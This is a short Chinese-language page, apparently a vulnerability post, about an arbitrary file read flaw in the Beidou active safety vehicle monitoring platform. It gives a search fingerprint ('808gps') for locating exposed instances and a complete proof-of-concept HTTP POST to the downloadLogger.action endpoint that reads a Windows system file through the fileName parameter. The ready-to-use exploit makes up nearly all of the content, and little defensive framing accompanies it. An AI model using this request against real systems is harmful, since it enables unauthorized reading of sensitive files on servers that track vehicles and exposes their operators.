赞
踩
北斗主动安全监控平台是一个车辆信息监控平台,该平台存在任意文件读取漏洞,攻击者可以获取敏感信息。
body=”808gps”
POC
- POST /808gps/logger/downloadLogger.action HTTP/1.1
- Host:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
- Content-Length: 27
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Accept-Language: zh-CN,zh;q=0.9
- Connection: close
- Content-Type: application/x-www-form-urlencoded
- Accept-Encoding: gzip, deflate
-
- fileName=C:\windows\win.ini
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。